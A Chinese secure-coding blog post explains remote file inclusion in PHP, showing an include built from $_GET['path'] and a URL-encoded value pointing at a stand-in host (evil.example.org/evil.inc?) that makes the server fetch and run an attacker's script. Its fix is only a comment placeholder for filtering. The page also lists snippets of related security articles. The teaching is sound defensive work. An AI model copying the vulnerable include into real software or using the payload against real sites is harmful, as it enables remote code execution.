PHP安全编程之文件包含的代码注入攻击

最新推荐文章于 2024-06-12 14:49:48 发布
最新推荐文章于 2024-06-12 14:49:48 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: php 网络安全

一个特别危险的情形是当你试图使用被污染数据作为动态包含的前导部分时:

<?php

include "{$_GET['path']}/header.inc";

?>

在这种情形下攻击者能操纵不只是文件名,还能控制所包含的资源。由于PHP默认不只可以包含文件,还可以包含下面的资源(由配置文件中的allow_url_fopen所控制):

<?php

include 'http://www.google.com/';

?>

include语句在此时会把http://www.google.com的网页源代码作为本地文件一样包含进来。虽然上面的例子是无害的,但是想像一下如果GOOGLE返回的源代码包含PHP代码时会如何。这样其中包含的PHP代码就会被解析并执行。这是攻击者借以发布恶意代码摧毁你的安全体系的良机。

想象一下path的值指向了下面的攻击者所控制的资源:

http://example.org/index.php?pat ... e.org%2Fevil.inc%3F

在上例中,path的值是URL编码过的,原值如下:http://evil.example.org/evil.inc?

这就导致了include语句包含并执行了攻击者所选定的脚本(evil.inc),同时原来的文件名/header.inc会被认为是一个请求串:

<?php

include "http://evil.example.org/evil.inc?/header.inc";

?>

这样攻击者就避免了去猜测剩下的目录和文件名(/header.onc)并在evil.example.org上建立相同的路径和文件名的必要性。相反地,在受攻击网站的具体文件名被屏蔽的情况下,他只要保证evil.inc中输出合法的他想要执行的代码就行了。

这种情况与允许攻击者在你的网站上直接修改PHP代码一样危险。幸运的是,只要在include和require语句前对数据进行过滤即可防止这种情况的发生:

<?php

$clean = array();

/* $_GET['path'] is filtered and stored in $clean['path']. */

include "{$clean['path']}/header.inc";

?>
爱代码也爱生活
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP注入文件
10-13
来自阿里云的PHP安全防护 1.将waf.php传到要包含文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('waf.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = waf.php路径;
php代码审计之命令注入(3)
01-09
PHP编程中,命令注入是一种严重的安全漏洞,它允许攻击者通过输入恶意代码来执行操作系统级别的命令。本文将深入探讨几种常见的PHP函数,这些函数在处理用户输入时如果不小心,可能导致命令注入。以下是对相关PHP...
php远程文件包含攻击,PHP安全编程文件包含代码注入攻击
weixin_35668158的博客
03-10 151
一个特别危险的情形是当你试图使用被污染数据作为动态包含的前导部分时:include "{$_GET['path']}/header.inc";?>在这种情形下攻击者能操纵不只是文件名,还能控制所包含的资源。由于PHP默认不只可以包含文件,还可以包含下面的资源(由配置文件中的allow_url_fopen所控制):include 'http://www.google.com/';?>in...
本地文件包含(LFI)攻击:原理、案例分析与防御策略
最新发布
m0_61532714的博客
06-12 729
LFI攻击允许攻击者通过利用Web应用程序对文件路径处理不当,将服务器上的本地文件包含到应用程序中,导致敏感信息泄露、代码执行严重后果。LFI攻击的核心在于利用Web应用程序对用户输入的文件路径处理不当,使得攻击者可以通过构造特定的文件路径,将本地文件包含到应用程序中并执行。一般LFI漏洞存在于应用程序的文件包含功能中,当应用程序直接使用用户输入的文件路径时,攻击者可以利用此漏洞读取服务器上的任意文件攻击者通过LFI漏洞读取服务器上的敏感文件,如配置文件、密码文件,获取服务器的敏感信息。
PHP实现依赖注入
cuixiaokuang9674的博客
10-30 422
我们来看一段代码: class A{ public function echo() { echo 'A'.PHP_EOL; } } class EchoT { protected $t; publ...
php注入源码,深入讲解PHP的对象注入(Object Injection)
weixin_39562197的博客
03-10 514
前言虽然这篇文章叫做PHP对象注入,但是本质上还是和PHP的序列化的不正确使用有关。如果你阅读了PHP中的SESSION反序列化机制对序列化就会有一个大致的认识。PHP对象注入其实本质上也是由于序列化引起的。基础知识在php类中可能会存在一些叫做魔术函数(magic 函数),这些函数会在类进行某些事件的时候自动触发,例如__construct()会在一个对象被创建时调用,__destruct()会...
文件包含
To be a better man
09-25 354
一个文件包含另一个文件的内容 格式: #include "文件名" 或 #include &lt;文件名&gt; 编译时以包含处理以后的文件为编译单位,被包含文件是源文件的一部分。 编译以后只得到一个目标文件.obj 被包含文件又被称为“标题文件”或“头文件”、“头部文件”,并且常用.h作扩展名。 修改头文件后所有包含文件文件都要重新编译 头文件的内容除了函数原型和宏定义外,还可以有结...
PHP编程函数安全
10-27
PHP编程中,确保函数的安全性至关重要,因为不安全的函数使用可能会导致一系列严重的安全问题,如SQL注入、跨站脚本攻击(XSS)、路径泄露、远程命令执行等。以下是一些关于PHP编程函数安全的重点: 1. 文件包含...
信息安全_PHP代码审计.PHP基础.pptx
08-14
代码审计中,需特别注意安全问题,如SQL注入、XSS跨站脚本、文件包含漏洞等。对于SQL注入,应使用预编译语句或PDO扩展来确保安全性。对于XSS,使用`htmlspecialchars()`或`htmlentities()`对用户输入进行转义。...
PHP 编程安全性小结
12-17
在构建Web应用程序时,PHP编程安全性至关重要。本文总结了四个关键原则,旨在帮助开发者创建更安全PHP应用。 **规则 1:绝不要信任外部数据或输入** 这是Web安全的基础,任何来源于用户或其他非程序员控制的...
php判断文件上传类型及过滤不安全数据的方法
10-25
PHP中,处理文件上传和过滤不安全数据是网站...在实际应用中,还需要考虑其他安全措施,如限制文件大小、存储路径的安全控制以及使用安全编程实践。确保这些方面都得到妥善处理,能够大大降低网站遭受攻击的风险。
php注入文件读取器
01-16
软件只用于学习交流,杜绝破坏社会稳定,伤害他人利益 本软件通过Mysql注入读取服务器上的程序,分为快速和慢速读取两种方式,用户可以自行选择。慢速读取可以修改并发线程数量来提高读取速度。
php注入代码
10-12
1.将waf.php传到要包含文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('waf.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('waf.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = waf.php路径;
php include引入,php 引入 include 的返回值
weixin_42184548的博客
03-10 156
php有一个include,顾名思义,就是用来包含文件的。相应的还有require,以及两个带once的。不知道大家有没有注意过include的 返回值。通常情况下,包含成功返回1,包含失败返回false。但是,如果被包含文件中用return返回,那么这个值就是return的值。比如:1.php$ret=include‘2.php‘;echo$ret;//输出wakaka?>2.p...
php mysql防注入字符串过滤_两段简单的PHP防SQL注入代码
weixin_39925813的博客
02-08 147
介绍两种方法吧,首先请把以下代码保存为safe.php放在网站根目录下,然后在每个php文件前加include("/safe.php");即可:php注入代码方法一://要过滤的非法字符$ArrFiltrate=array("‘",";","union");//出错后要跳转的url,不填则默认前一页$StrGoUrl="";//是否存在数组中的值function FunStringExist($...
【攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 449
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
PHP命令注入
Jack huang的专栏
03-26 1088
使用下列5个函数来执行外部的应用程序或函数 system、exec、passthru、shell_exec、“`”
带你搞懂PHP对象注入详细教程
我的博客,不一样的自我表达
04-17 410
不过需要注意的是,利用场景不限于magic函数,也有一些方式可以在一半的函数中利用这个漏洞,打个比方,一个模块可能定义了一个叫get的函数进行一些敏感的操作,比如访问数据库,这就可能造成sql注入,取决于函数本身的操作。你可以看到,我们创建了一个对象,序列化了它(然后__sleep被调用),之后用序列化对象重建后的对象创建了另一个对象,接着php脚本结束的时候两个对象的__destruct都会被调用。事实上,利用这玩意的可能性有很多种,关键取决于应用程序的流程与,可用的类,与magic函数。
php注入入侵实例
weixin_30246221的博客
05-05 204
听承诺说CASI出2.0了,而且承诺也给了一个有漏洞的地址,正好没事就测试了一下,最近非常郁闷,学不下去,正好今天承诺勾起了我学习php的美好时光,看看自己还能不能搞这样的站吧. 过程: 承诺给的地址是http://www.gametea.com//showboard.php?id=282 很标准的php注入形式,我们也按照标准的php注入方法来进行注入,首先再后面加一个', http://www...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值